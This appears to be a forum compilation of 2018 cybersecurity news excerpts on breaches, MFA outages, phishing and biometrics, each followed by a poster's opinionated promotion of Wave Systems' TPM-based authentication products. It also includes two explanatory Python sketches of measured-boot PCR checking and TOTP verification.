Manufacturers Remain Slow to Recognize Cybersecurity Risk
https://www.nytimes.com/2018/11/21/business/manufacturers-remain-slow-to-recognize-cybersecurity-risk.html
Excerpt near the end of article -
Another approach is to adopt something called whitelisting. For years, Mr. Patel said, most companies had software that excluded known viruses, essentially blacklisting potential problems. But that was too reactive and sometimes exposed systems to unknown attackers. Now, he said, the better approach is to whitelist — that is specify approved software applications that are permitted to be active on a computer system. “It’s increasingly become one of the most important types of defenses.”
=================================================================
Wave Endpoint Monitor uses whitelisting to protect computer systems and is one of the advantages over traditional antivirus.
=================================================================
https://www.wavesys.com/products/wave-endpoint-monitor
Excerpt:
By using the TPM to attest to the security of the device each time that device boots, Wave looks below the operating system and can help detect threats lurking there. Every time a device boots up, Wave Endpoint Monitor makes a comparison against previous boot values, and if anything deviates from the norm, it alerts you immediately.
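The excerpt describes comparing each boot's TPM values against the values recorded on earlier boots. The Python script below is an added illustration of that mechanism and is not code from Wave or from the article: it simulates a measured boot in which each component's hash is extended into a Platform Configuration Register (PCR) as SHA-256(old_PCR || SHA-256(component)), then lists which registers deviate from a stored known-good baseline. The component names, their contents and the register assignments are constructed sample data (the indexes loosely follow the PC-client convention of PCR0 for firmware, PCR4 for the boot manager and PCR7 for the Secure Boot policy).

```python
import hashlib

PCR_SIZE = 32  # bytes in one register of a SHA-256 PCR bank


def extend(pcr, measurement):
    """TPM PCR extend: new_PCR = SHA-256(old_PCR || SHA-256(measurement)).
    Extends are one-way and order-sensitive, so a register value commits to
    the whole sequence of components that were measured into it."""
    return hashlib.sha256(pcr + hashlib.sha256(measurement).digest()).digest()


def measure_boot(components):
    """Simulate a measured boot. `components` maps a PCR index to the ordered
    list of byte strings (stand-ins for firmware/bootloader images) measured
    into that register. Every register starts at all zeros.
    Returns {index: hex value}."""
    pcrs = {}
    for index, parts in components.items():
        value = bytes(PCR_SIZE)
        for part in parts:
            value = extend(value, part)
        pcrs[index] = value.hex()
    return pcrs


def deviating_pcrs(baseline, current):
    """Sorted PCR indexes whose current value differs from the baseline.
    A register missing from `current` counts as a deviation as well."""
    return sorted(i for i in baseline if current.get(i) != baseline[i])


def check_boot(baseline_components, current_components):
    """Compare a new boot against the recorded-good one; [] means no change."""
    return deviating_pcrs(measure_boot(baseline_components),
                          measure_boot(current_components))


# Constructed sample data (not real firmware hashes).
KNOWN_GOOD_BOOT = {
    0: [b"uefi-firmware-1.2.0", b"firmware-settings"],
    4: [b"boot-manager-3.1"],
    7: [b"secure-boot-policy", b"db-signing-cert"],
}
TAMPERED_BOOT = {
    0: [b"uefi-firmware-1.2.0", b"firmware-settings"],
    4: [b"boot-manager-3.1-modified"],   # the boot manager image was altered
    7: [b"secure-boot-policy", b"db-signing-cert"],
}

if __name__ == "__main__":
    print("same boot ->", check_boot(KNOWN_GOOD_BOOT, KNOWN_GOOD_BOOT))  # []
    print("tampered  ->", check_boot(KNOWN_GOOD_BOOT, TAMPERED_BOOT))    # [4]
```

The comparison only tells you that a register changed, not what changed; in practice the event log that accompanies the PCRs is what lets an operator tell a legitimate firmware update from an unwanted modification, and a baseline has to be re-recorded after every approved update or the monitor will keep alerting.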
PI System Software Maker, OSIsoft, Announced Breach
https://www.infosecurity-magazine.com/news/pi-system-software-maker-osisoft?utm_source=twitterfeed&utm_medium=twitter
A self-proclaimed leader in enabling operational intelligence, OSIsoft, maker of PI system software, announced an ongoing investigation into a data breach that likely compromised all domain accounts.
On 16 November, the company reported that it was experiencing a security incident that potentially affected everyone from employees and interns to consultants and contractors. Attackers reportedly stole credentials and used them to access the OSIsoft computers, which resulted in alerts of unauthorized activity from the intrusion detection systems.
“Our security service provider has recovered direct evidence of credential theft activity involving 29 computers and 135 accounts. We have concluded, however, that all OSI domain accounts are affected,” the data breach notification warned.
Additionally, the company advised, “You should assume your OSI domain logon account name, as well as email address and password have been compromised.”
The incident remains under investigation with the company’s security service providers, and OSIsoft reported that it “has developed a comprehensive remediation strategy that includes a contingency plan, in case there is an escalation of unauthorized activity as the investigation continues.”
The company also advised that users reset external accounts to use different passwords.
“While most organizations factor vendors, suppliers and contractors into their third-party risk management programs, the reality is that our digital ecosystems are a lot bigger than that. Any third party in a company’s digital ecosystem can be the weak link that gives attackers a clear path to exposed data,” said Fred Kneip, CEO, CyberGRX.
“In this case, OSIsoft’s security controls weren’t able to stop a case of credential theft, affecting a confirmed 135 accounts and possibly more. With over 65% of Fortune 500 industrial companies using their product, OSIsoft is a major gateway to valuable data and they should be seen as such. Large companies like these often interact with tens of thousands of third parties, and it’s critical for them to gain a better understanding of which of those third parties pose the biggest risk to their data.”
=================================================================
In this case and in many cases 'security controls' and/or intrusion detection systems would be less effective than ERAS, Wave VSC 2.0. When using ERAS, VSC 2.0 the unauthorized party or activity would not have been allowed on the network (see ERAS below). This use case shows how beneficial ERAS, Wave VSC 2.0 could be for a lot of companies. imo.
================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Secure device & user authentication
Sometimes it feels like security is more effective at deterring your users than hackers. But you still have to protect your enterprise resources, and we’re here to help. We take pride in securing your network, data, and resources to an unprecedented level, without causing a revolt from either IT or your users. In fact, your users probably won’t even know we’re there.
Here’s how it works:
Trusted Platform Module (TPM) + Wave’s ERAS for TPM Management = hardware-secured, fully-managed authentication
Most of your devices already come with TPMs (check out our “What is a TPM?” brochure if you’re not sure why this is exciting). This security chip comes attached to the motherboard of most enterprise-class PCs. There’s nothing “add-on” about it. The TPM provides a verifiable, unique identity for each machine.
Wave’s ERAS for TPM Management gives IT remote, centralized management of all TPMs on enterprise computers and tablets.
With this control, IT can set policies and dictate which machines and users have authority to access which resources. IT can ensure that only known and approved devices are accessing your network. And what’s more, IT can prove it with detailed activity logs.
In a post-EMV world, fraud is shifting from in-person to ecommerce channels
https://www.helpnetsecurity.com/2018/11/19/fraud-concern-merchants/
Three years after the switch to new chip-based credit and debit cards, a study by the National Retail Federation and Forrester says payment card fraud is still a top concern for large U.S. retailers as criminals move their activities online.
“The implementation of EMV chip cards and chip card readers was supposed to dramatically reduce credit and debit card fraud,” the State of Retail Payments report said. “So why is fraud still the top concern for merchants?”
The report found that fraud was the top payment-related challenge faced by retailers, cited by 55 percent of those surveyed. The reason is largely that Europay-MasterCard-Visa chip cards have moved payment card fraud away from stores and toward online transactions, the report said, citing a Forter study showing a 13 percent increase in online fraud last year. A Federal Reserve study said online fraud rose from $3.4 billion in 2015 – the first year retailers were required to accept chip cards or face an increase in fraud liability – to $4.6 billion in 2016 and was an “increasing concern.”
“In a post-EMV world, fraud is shifting from in-person to ecommerce channels, so retailers have been busy bolstering their defenses to mitigate the increasing costs and risks of ecommerce fraud,” the report said.
To help fight fraud, the report found that retailers want better authentication of purchases no matter where they take place and that 33 percent have implemented 3-D Secure, a system marketed as Verified by Visa or MasterCard SecureCode that is intended to help authenticate online purchases.
For in-person purchases, 51 percent of merchants said biometrics would be the best way to verify transactions, and 53 percent expressed interest in implementing forms such as the fingerprint and facial recognition available on smartphones. But with that technology limited to phones rather than cards, 46 percent said personal identification numbers would be the best currently available way to approve card transactions.
For purchases made with cards, 95 percent of retailers said requiring PINs would improve security and 92 percent would implement it if it were available. While EMV cards in other countries are chip-and-PIN, virtually all EMV credit cards issued by U.S. banks have been chip-and-signature with PIN available only on debit cards. And the major credit card companies stopped requiring a signature last year.
“The chip in an EMV card makes it very difficult to counterfeit the card, but it does nothing to show whether the person trying to use the card is the legitimate cardholder,” NRF Senior Vice President and General Counsel Stephanie Martz said. “If we want to stop card fraud, we need a better way of authenticating users and it should be one that’s affordable, easy and safe. Someday the answer might be biometrics or technology that has yet to be invented but, in the meantime, we know PIN can stop criminals dead in their tracks. With no signatures, no PIN and no biometrics, what we have right now is no authentication at all.”
NRF has long argued that PIN is important because the chip in EMV cards only prevents the use of counterfeit cards while not stopping lost or stolen cards, and a PIN can also provide a backup for cases where the chip malfunctions or is tampered with.
In addition to the focus on cards, retailers have also been installing technology to fight data breaches and thereby keep criminals from stealing card data that can then be used to commit fraud. The report found 89 percent expect to have tokenization in place by the end of next year, and that 80 percent plan to do the same with point-to-point encryption.
The second-biggest concern was the cost of accepting payment cards, including the swipe fees banks charge to process transactions, cited by 45 percent. While the survey found 49 percent of retailers have taken advantage of routing options required as part of a cap on debit card swipe fees passed by Congress in 2010, rising swipe fees for credit cards remain the subject of litigation between retailers and the card industry. Chargebacks of disputed purchases, which increased after implementation of EMV for some retailers, were the third-biggest concern, cited by 35 percent.
“Eliminating fraud and improving authentication are clearly top priorities for retailers,” Brendan Miller, principal analyst at Forrester, said. “As the answers to these challenges are found, the key will be finding ways to implement the solutions in a way that provides a frictionless experience for consumers.”
=================================================================
Wave and Bell ID Partner to Combat Online Payment Fraud
card-present transactions enabled for E-Commerce by integrating TPM technology
https://www.wavesys.com/buzz/pr/wave-and-bell-id-partner-combat-online-payment-fraud
Lee, MA -
July 31, 2014 -
Wave Systems Corp. (NASDAQ: WAVX) announced it is partnering with chip lifecycle management solutions company, Bell ID, to offer a joint solution aimed at reducing online payment fraud. The solution will be marketed primarily to card issuing banks, as well as online merchants, governments, and enterprises worldwide.
Using Bell ID’s Trusted Service Manager and Secure Element in The Cloud (SEiTC) server, alongside Wave’s ERAS for TPM management and Wave’s endpoint identity and monitoring expertise, the combined offering provides robust protection for transactions and stored payments. The companies have executed a letter of intent and anticipate the signing of a definitive agreement in August.
The incident rate of card-not-present (CNP) fraud has been growing steadily over the past several years. According to a recent FICO Banking Analytics Blog, CNP fraud now accounts for close to half of all credit card fraud. Countries that have already adopted the EMV® card specification have seen CNP fraud rates increase. In the United States, CNP fraud is expected to rise significantly over the next eighteen months, as the EMV standard is put into effect. The EMV directive, which implements a global standard for a secure chip-based payment application, will make merchants liable for any fraud resulting from transactions on systems that are not EMV-capable.
“Wave’s robust product portfolio is very complementary to Bell ID’s strongly positioned solution set in the financial services market,” said Bill Solms, CEO, Wave Systems. “We see the EMV transition creating high demand for more secure transaction capabilities, and are confident that together we can provide financial institutions with a comprehensive solution for payment authorization and storage.”
“Bell ID has been a pioneer in developing and delivering cloud-based payment platforms,” adds Pat Curran, Executive Chairman at Bell ID. “We also have extensive experience in delivering EMV solutions globally and have witnessed fraud transition online as point-of-sale terminals in face-to-face transactions become more secure. We are therefore delighted to extend our offering with Wave to provide a secure online transaction and storage payment solution, which will mitigate against an expected rise in online fraud and provide a trusted link between device identity and internet services.”
Phishers Up Their Game to Combat User Awareness
https://www.infosecurity-magazine.com/news/phishers-up-game-to-combat-user?utm_source=twitterfeed&utm_medium=twitter
In an attempt to undermine the security industry’s effort to educate end users about phishing campaigns, malicious actors are evolving in their tactics, according to Zscaler.
In a recent blog published by Zscaler Threat LabZ, Deepen Desai and Rohit Hegde detailed findings of new research into phishing activities. According to the findings, Microsoft, Facebook and PayPal are the top brands that are being targeted by phishing campaigns.
The top five sector categories that are most commonly targeted are communications (41.4%), social media (18.3%), finance (16.7%), travel (12.4%) and dating (3.4%).
“In addition to the known brands, it was interesting to see phishing campaigns targeting Travel Visa portals (Canadian Visa and Australian Visa, for example) included in our top five most targeted brands. The attackers in this case were most likely interested in phishing for sensitive immigration information, such as passport details, date of birth and national identification numbers,” Desai and Hegde wrote.
Notably one of the best tools in a hacker’s toolbox, phishing is a successful tactic long used by attackers who are looking to steal personally identifiable information, such as Social Security numbers, credit card details, date of birth, and other sensitive data.
Wrote the authors, “About 65% of all phishing content we’ve seen in the past three months was over HTTP and the remaining 35% was over HTTPS. This represents a 300% increase in phishing content being delivered over HTTPS since 2016.”
Because the security industry has been diligent in its efforts to raise awareness, putting great effort into educating users how to identify phishing sites, cybercriminals have reportedly had to up their game. The attackers have had to get creative in order to trick better-informed users, and they are reportedly now carefully designing sites to look identical to the popular brands they are imitating.
"As the end users become more vigilant against clicking suspicious links, attackers have also upped the ante by evolving the way in which the phishing content is being delivered as well as tactics being leveraged to make the phishing pages stay undetected for a longer period," they wrote.
=================================================================
Given this new information, educating users on phishing could be even less effective than using Wave VSC 2.0 (2FA). The phished password would not have an effect on the login since the login is a PIN, and even if the PIN was somehow phished the hacker would need the user's computer (TPM). The newer phishing site designs and the reduced effectiveness of user education create another great selling point for Wave VSC 2.0!!
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpt:
Key Features:
Strong Security
• Authenticate securely, encrypt email, and prove integrity of the device with one management console
• Protect against phishing, malware and other network security threats by storing authentication credentials in hardware
• Provide centralized enforcement of custom policies
Cybersecurity Is a Top Concern for Healthcare Executives
https://futurism.com/the-byte/cybersecurity-healthcare-executives
Priority Numero Uno
Cybersecurity isn’t just a top technology concern of today’s healthcare executives — it’s the top concern.
That’s according to “Top of Mind for Top Health Systems 2019,” a new report co-authored by the Center for Connected Medicine (CCM), a think tank focused on the use of technology in healthcare, and the Health Management Academy, a network of healthcare executives.
Weak Link
To produce this report, the CCM and the Academy surveyed and interviewed 44 executives from 38 health systems representing 459 hospitals across the U.S.
According to those executives, the most common types of cyberattacks their institutions had faced in the previous 12 months were phishing and spear-phishing. Both of those involve gaining access to a network by essentially tricking a person into handing over valuable information, such as passwords and usernames, and they can enable a hacker to access sensitive information about patients.
It’s not entirely surprising, then, that 62 percent of those who contributed their insights to the report believe staff members are the primary point of weakness in their institutions’ cybersecurity. “Employee education” was also cited as the most common cybersecurity challenge, implying it’s a weak spot that hasn’t been easy to address.
Shoring Up
Thankfully, hospitals appear prepared to meet the challenge of cybersecurity head on. Not one of the respondents claimed their health system planned to decrease spending on cybersecurity efforts in 2019. In fact, 87 percent said they planned to spend more than they did in 2018.
“The people that are up to no good have far better tools than we do on our platforms,” one CEO told the report’s creators. “If they really target you, they will likely find a way in…We are not trying to make it impenetrable, but we are trying to make it more difficult to break into our system than others in our market.”
=================================================================
Rather than focusing on phishing education to prevent cyber attacks, the focus should be on using 2FA like Wave VSC 2.0 as a more foolproof way to protect healthcare companies (and other companies as well) from cyber attacks. imo. Taking the human factor (education of employees) out of the cybersecurity equation is a great selling point for Wave VSC 2.0!!
================================================================
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpts:
Key Features:
Strong Security
• Authenticate securely, encrypt email, and prove integrity of the device with one management console
• Protect against phishing, malware and other network security threats by storing authentication credentials in hardware
• Provide centralized enforcement of custom policies
Low TCO
• Reduce operating expenses by eliminating password reset and shortening deployment times
• Minimize capital expenses by using hardware you already have
• Integrate with Microsoft Active Directory for IT familiarity
Superior User Experience
• No more tokens or smart cards to achieve two-factor authentication
• Eliminate VPN/WiFi/website passwords for faster access to resources
• No add-on software means improved OS performance
Flexibility
• Compatible with Windows 8.1, 8, 7 and Vista operating systems – manage mixed environments from one console
• Create custom management policies to suit your organization’s needs
• User and device authentication from a common console
Seamless Device Authentication
• Access control over wireless (i.e. 802.1x)
• Single sign-on
• VPN authentication (i.e. Microsoft DirectAccess)
LastPass? More like lost pass. Or where the fsck has it gone pass. Five-hour outage drives netizens bonkers
https://www.theregister.co.uk/2018/11/20/fivehour_outage_frustrates_lastpass_punters/
LastPass's cloud service suffered a five-hour outage today that left some people unable to use the password manager to log into their internet accounts.
Its makers said offline mode wasn't affected – and that only its cloud-based password storage fell offline – although some Twitter folks disagreed. One claimed to be unable to log into any accounts whether in “local or remote” mode of the password manager, while another couldn't access their local vault.
The solution, apparently, was to disconnect from the network. That forced LastPass to use account passwords cached on the local machine, rather than pull down credentials from its cloud-hosted password vaults. Folks store login details remotely using LastPass so they can be used and synchronized across multiple devices, backed up in the cloud, shared securely with colleagues, and so on.
The problems first emerged at 1408 UTC on November 20, with netizens reporting an “intermittent connectivity issue” when trying to use LastPass to fill in their passwords to log into their internet accounts. Unlucky punters were, therefore, unable to get into their accounts because LastPass couldn't cough up the necessary passwords from its cloud.
The software's net admins worked fast, according to the organisation's status page. Within seven minutes of trouble, the outfit posted: “The Network Operations Center have identified the issue and are working to resolve the issue.”
The biz also reassured users that there was no security vulnerability, exploit, nor hack attack involved:
Connectivity is a recurrent theme in LastPass outages: in May, LogMeIn, the developers behind LastPass, suffered a DNS error in the UK that locked Blighty out of the service.
The service returned at nearly 2000 UTC today, when the status team posted: “We have confirmed that internal tests are working fine and LastPass is operational. We are continuing to monitor the situation to ensure there are no further issues.”
=================================================================
The use of Wave VSC 2.0 imo could prevent situations like the one faced by LastPass customers in the article above. Wave VSC 2.0 is similar in certain ways (in its aim) to LastPass but with better security. Wave VSC 2.0 not being susceptible to a situation like this is a great selling point for Wave. imo.
=================================================================
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpts:
Token-free, password-free user authentication
We know you’ve dreamt about shredding your list of passwords. Go on and do it.
Because you are starting the authentication process in the device’s hardware, the user doesn’t have to interact with it. All users see is their usual Windows log-in screen – no more additional passwords to access the VPN or other resources. They just sign in once, and the secure credentials in their TPMs securely and quickly connect them to everything they need. Say goodbye to user frustration and slow OS performance.
Decrease expenses with virtual smart cards
You know what else happens when you take passwords out of the equation? A lot fewer calls to IT. Imagine if you took password resets out of the picture – that frees up a chunk of IT time, lowering your operating expenses significantly.
If your organization currently uses traditional tokens or smart cards, switching to virtual smart cards takes an even bigger burden off of IT – we use the hardware-protected credentials in the TPM to create a virtual smart card, which performs the same functionality as traditional smart cards. That means no need to purchase, deploy, replace or maintain external tokens, smart cards or smart card readers. Because virtual smart cards are already on your machines and can’t be forgotten, lost or stolen, you have lower capital expenses and lower operating expenses.
Wave's is the only management solution to support virtual smart cards on Windows 7, as well as Windows 8 and 8.1.
Microsoft confirms: We fixed Azure by turning it off and on again. PS: Office 362 is still borked
https://www.theregister.co.uk/2018/11/19/microsoft_azure_office_outage_latest/
Redmond battles TITSUP multi-factor auth logins (yes, that's Total Inability To Support Users' Passcodes)
Microsoft is recovering somewhat from a bad case of the Mondays that left some of its subscribers unable to use multi-factor authentication to log into their cloud services.
The Redmond giant said that around 2130 UTC today it had managed to get its Azure Cloud back up and running as per normal. Meanwhile, Office 364 is still being knocked into shape by the Windows giant's techies.
Azure and the cloud-based Office suite started playing up at 0439 UTC, meaning multi-factor authentication has been knackered for about 17 hours, preventing unlucky users from logging in.
Cycle-pathic
In the case of Azure, the fix seemed relatively straightforward, if not cliche. Microsoft turned their computers off and on again, according to the cloud platform's status page at time of writing:
Engineers cycling of impacted servers is complete and initial telemetry and customer reports indicates issue is majority mitigated. telemetry will continue until mitigation confirmed. Engineers will continue to monitor any updates or changes made from the work-streams currently being explored.
Just as we were publishing this story, we noticed Microsoft had quietly revised its explanation of the Azure cock-up: it now blames an overloaded Redis database in Europe that ultimately took out other systems when it tried to fail over to equipment in North America. A hotfix was applied, and machines were rebooted, to revive the platform's multi-factor authentication systems, as the status page now explains:
Preliminary root cause: Requests from MFA servers to Redis Cache in Europe reached operational threshold causing latency and timeouts. After attempting to fail over traffic to North America this caused a secondary issue where servers became unhealthy and traffic was throttled to handle increased demand.
Mitigation: Engineers deployed a hotfix which eliminated the connection between Azure Identity Multi-Factor Authentication Service and a backend service. Secondly engineers cycled impacted servers which allowed authentication requests to succeed.
In a way, Microsoft is saying its cloud couldn't handle the weight of multi-factor login requests. Given the multi-factor tokens are only valid for a short time – there's typically a 60-second window to enter the correct code – high latency becomes a real problem.
As for Office 363-and-a-half, the fix does not appear to be so straightforward. Redmond said that it is still working on the problem, and as of right now engineers aren't even sure just what went wrong.
"Due to the complex nature of this problem, our investigation into the root cause of this issue may take an extended period of time," Microsoft told customers. "This incident is and will remain our highest priority until the underlying source of the problem has been identified."
This is after many, but not all, punters have spent most of the day unable to log in to their Microsoft-hosted services via multi-factor authentication. The outages were felt worldwide, beginning in the afternoon of Monday in Asia, and carrying on into Europe's start-of-the-week, and into the Americas as unlucky users found themselves unable to use their two-factor gizmos to log in.
For security reasons, multi-factor authentication is highly recommended in order to prevent password-stealing hackers from hijacking accounts.
Now, with Asia nearly ready to get up and start its Tuesday workday, Microsoft has yet to fully resolve its Office 359 login headaches. Passwords also cannot be reset by users.
If there is one saving grace for Redmond, it is that thanks to the impending Thanksgiving holiday combined with severe weather on the US East Coast and wildfire-induced pollution in California, a good number of Americans are working from home on Monday, potentially limiting frustrations stemming from the outages: it's quite easy to go back to bed if you can't even log in.
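The article's point that multi-factor codes are only valid for a short window, so that latency alone can turn into login failures, is easiest to see in the verifier's own arithmetic. The Python implementation of HOTP and TOTP (RFC 4226 / RFC 6238) below is an added example and has nothing to do with Microsoft's or Wave's code: it shows how a verifier accepts a code only within a configurable number of adjacent time steps, and how a code that arrives after that window is rejected even though it was correct when generated. The 30-second step, the one-step skew allowance, the timestamps and the demonstration secret (the seed used in the RFC test vectors) are assumptions chosen for the illustration.

```python
import hashlib
import hmac
import struct


def hotp(secret, counter, digits=6, algo=hashlib.sha1):
    """RFC 4226 HOTP: HMAC over the 8-byte big-endian counter, then dynamic
    truncation to a `digits`-digit decimal code."""
    mac = hmac.new(secret, struct.pack(">Q", counter), algo).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret, at_time, step=30, digits=6, algo=hashlib.sha1):
    """RFC 6238 TOTP: HOTP with counter = floor(unix_time / step)."""
    return hotp(secret, int(at_time) // step, digits, algo)


def verify_totp(secret, code, at_time, step=30, digits=6, skew_steps=1):
    """Verifier-side check. Accepts the code if it matches the current time
    step or any step within +/- skew_steps (tolerating clock drift and
    delivery delay). Returns the matching step offset, or None if rejected."""
    current = int(at_time) // step
    for delta in range(-skew_steps, skew_steps + 1):
        if hmac.compare_digest(hotp(secret, current + delta, digits), code):
            return delta
    return None


def delivered_late(secret, generated_at, verified_at, step=30, skew_steps=1):
    """Does a code generated at `generated_at` still verify at `verified_at`?
    This is the latency question: the code is right, only its arrival is late."""
    code = totp(secret, generated_at, step)
    return verify_totp(secret, code, verified_at, step,
                       skew_steps=skew_steps) is not None


# Constructed demonstration secret (the RFC 6238 test-vector seed).
DEMO_SECRET = b"12345678901234567890"

if __name__ == "__main__":
    t0 = 1_000
    print(delivered_late(DEMO_SECRET, t0, t0 + 10))   # True: same 30-second step
    print(delivered_late(DEMO_SECRET, t0, t0 + 45))   # True: next step, within skew
    print(delivered_late(DEMO_SECRET, t0, t0 + 75))   # False: two steps late
```

Widening `skew_steps` makes the service more tolerant of slow delivery but also lengthens the period during which an intercepted code stays usable, so the window is a trade-off rather than a free setting; an SMS-delivered code, as in the outage described above, has the additional delay of the carrier network inside that same window.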
=================================================================
Since Wave VSC 2.0 doesn't use SMS for multi-factor authentication, it is highly conceivable that this problem in the article wouldn't have happened if the user had Wave VSC 2.0! A great selling point for Wave VSC 2.0! imo.
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
2FA Login Failure in Office 365 and Azure
https://www.infosecurity-magazine.com/news/2fa-login-failure-in-office-365?utm_source=twitterfeed&utm_medium=twitter
According to tweets from Microsoft, the company is investigating reports that Azure and Office 365 are again suffering issues that are leaving users unable to log in using multifactor authentication (MFA). When users enter their login credentials and are sent an SMS with a two-factor authentication (2FA) code, the screen does not advance for the user to enter the code, according to a Reddit discussion.
Azure Support also tweeted, “Engineers are actively investigating an ongoing issue affecting Azure Active Directory, when Multi-Factor Authentication is required by policy.”
News of the issue comes less than a month after a reported login problem that left many admins and users unable to access their accounts for several hours. This latest issue is affecting global users, including people from Norway, Australia and the United States expressing frustrations via social media sites.
The most recent status update from Azure as of publication time stated: “Starting at 04:39 UTC on 19 Nov 2018 customers in Europe and Asia-Pacific regions may experience difficulties signing into Azure resources, such as Azure Active Directory, when Multi-Factor Authentication is required by policy.
“Engineers have deployed the hotfix which eliminated a connection between Azure Identity Multi-Factor Authentication Service and a backend service. The deployment of this Hotfix took some time to take effect across the impacted regions. We are seeing a reduction in errors, and customers may be seeing signs of recovery and authentications are succeeding.”
Since the hotfix has been deployed, engineers are continuing to monitor the ongoing performance and will provide updates as necessary.
“Another day, another Office 365 disruption, and another nuisance for admins and employees alike. With less than a month between disruptions, incidents like today’s Azure multifactor authentication issue pose serious productivity risks for those sticking to a software-as-a-service monoculture,” said Pete Banham, cyber resilience expert at Mimecast.
“With huge operational dependency on the Microsoft environment, no organisation should trust a single cloud supplier without an independent cyber resilience-and-continuity plan to keep connected and productive during unplanned, and planned, email outages. Every minute of an email outage could cost businesses hundreds and thousands of pounds. Without the ability to securely log in, knowledge worker employees are unable to do their jobs. The question is if your work email and productivity are dependent on Office 365, how much have these hours of disruption cost you so far?”
=================================================================
Office 365, Azure Users are Locked Out After A Global Multi-Factor Authentication Outage
https://techcrunch.com/2018/11/19/office-365-azure-users-are-locked-out-after-a-global-multi-factor-authentication-outage/
=================================================================
These articles are more selling points for Wave VSC 2.0 imo.
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
Excerpts:
Get better security at less than half the cost
Passwords are weak. Tokens are expensive. Don’t compromise on security or price.
When we say “secure”…
…we mean it. Our solution starts with a proven hardware root-of-trust. Multi-factor authentication is an established best-practice for strong authentication: the TPM-based virtual smart card is one factor (something you have) and the user PIN is a second factor (something you know).
Key Features:
• Full lifecycle management of virtual smart cards
• Intuitive interface to create (or delete) virtual smart cards
• Command line option to create and delete virtual smart cards
• Flexible PIN policies
• Helpdesk-assisted PIN reset and recovery
• Generates reports for compliance
• Integrates with Active Directory
• Supports familiar use cases:
  ◦ Virtual Private Network (VPN)
  ◦ Local logon
  ◦ Remote logon
  ◦ Remote desktop access
  ◦ Intranet/Extranet
  ◦ Cloud applications
Biometrics and AI firm team up for first U.S. biometric database amidst criticism
https://www.scmagazine.com/home/security-news/biometrics-and-ai-firm-team-up-for-first-u-s-biometric-database-admist-criticism/
Biometrics firm SureID and AI-startup firm Robbie.AI are teaming up to launch the first U.S. biometric database.
SureID has a nationwide network of fingerprint enrollment kiosks, while Robbie.AI uses AI-based facial recognition and behavioral prediction for authentication; the two could be combined to create a nationwide biometric database for consumer-focused initiatives, according to a press release.
The technology could be used in retail authentication, employment verification, IDs for keyless automated vehicles and other multi-level biometric authentication uses, and the companies say they are using the highest security measures to protect their data.
“SureID plans to continue to lead with advanced security threat responses and military-grade security mechanisms designed to thwart bad actors and protect personal and corporate security,” SureID General Manager Ned Hayes told SC Media. “SureID R&D is currently researching technology that could allow individuals to have full control over their biometric data information without concerning themselves with the required backup strategies.”
Furthermore, Hayes said his firm is one of a handful of selected FBI fingerprint channeling partners and that its system provides end-to-end encryption, physical and electronic security measures in a secure cloud infrastructure validated and approved by the FBI and other government agencies.
Karen Marquez, CEO of Robbie.AI, told SC Media that her firm never stores frames from video or photo and only saves biometric cues through coordinates and other custom indicators from the original face in the form of numbers that are stored as a ciphered binary.
“There is no way to link this binary data to personal data or a person’s identity from our backend because we do not keep the original person link,” Marquez said. “Moreover, even in the event of any attempt of compromising the database, deciphering the binaries into raw descriptors provides hundreds of thousands of floating point numbers.”
Marquez added that there is no way to reverse engineer the numbers into pixels, know who the numbers belong to, or even understand them as they are separated and stored into a different provider and data center.
In addition, Hayes said SureID today only collects data that has been submitted to their system via full consumer knowledge and full consumer participation, for authorized purposes only, and that it collects data and deletes data in full compliance with all government regulations regarding data preservation and deletion.
Despite the assurance, the technology has privacy and cybersecurity experts concerned about the companies’ abilities to protect the data, how the data will be used, and the potential for misuse.
“On one hand, I appreciate the need for rapid identification of people who intend to cause harm and the ability to detect these people quickly in public places,” Chris Morales, head of security analytics at automated threat management solutions firm Vectra, told SC Media. “On the other, it sounds like a huge privacy nightmare as I am very concerned about the misuse or manipulation of a database of biometric authentication at this scale.”
Morales said a national biometric database is almost inevitable, since society and governments have been heading towards some form of rapid, real-time person identification for decades. This started with video security monitoring cameras in most public places around the world, and the addition of machine learning has even made it possible to recognize the way a person walks as a unique identifier.
“I think as a security industry, our best course of action is to work with the national governments to ensure any biometric system is highly secure and has auditing and oversight to ensure the proper use of the biometric data,” Morales added. “This type of data would mean anyone could be found instantly at any time. It could be very scary.”
The technology also causes worry to some considering the backdrop of recent elections where many states’ voter identification procedures are woefully lacking.
“It is a little concerning that some loose affiliation of private companies will have the ability to identify me in public and track me without my consent,” Rick Moy, chief marketing officer at Acalvio, said. “And do who knows what with the data to sustain their business models.”
Other researchers emphasized that despite the protections in place, the data could still potentially be misused even by law enforcement.
“AI and ML algorithms often mirror and amplify the biases of the data collected,” Abhishek Iyer, technical marketing manager at Demisto, said. “If criminal investigations will be based on biometric recognition whose accuracy is already compromised by bias, it can lead to wrongful arrests, distress for US travelers, and lost government resources.”
Not everyone was against the technology, and some even supported it. Frances Zelazny, BioCatch chief strategy officer, said there is a dire need for a better system in the U.S. to more accurately identify people and verify that they are who they say they are.
“Because there is no central ID system and personal information is widely available on the Internet thanks to the data breaches, the classic KYC process no longer works in the U.S. and in essence,” Zelazny said. “The Internet of Things will only continue to make our world more interconnected, and where we present our identity on one application may mean that several other modes are affected.”
Zelazny added that action is needed from government, private sector and consumer advocate stakeholders who must collaborate on an identity framework that can support trusted online interactions.
=================================================================
These AI-generated fake fingerprints can fool smartphone security
https://www.zdnet.com/article/these-ai-generated-fake-fingerprints-can-fool-smartphone-security/
Attackers no longer need your actual fingerprint to unlock your phone
Researchers have refined a technique to generate fake fingerprints that match multiple people, potentially undermining fingerprint-based access-control systems.
The technique opens up the possibility of fingerprint-based 'dictionary attacks', or the biometric equivalent of throwing a large set of possible passwords at a login page on the chance that one of them is correct.
The researchers from New York University detail in a new paper how they used a neural network to create 'DeepMasterPrints', or realistic synthetic fingerprints that have the same ridges visible when rolling an ink-covered fingertip on paper.
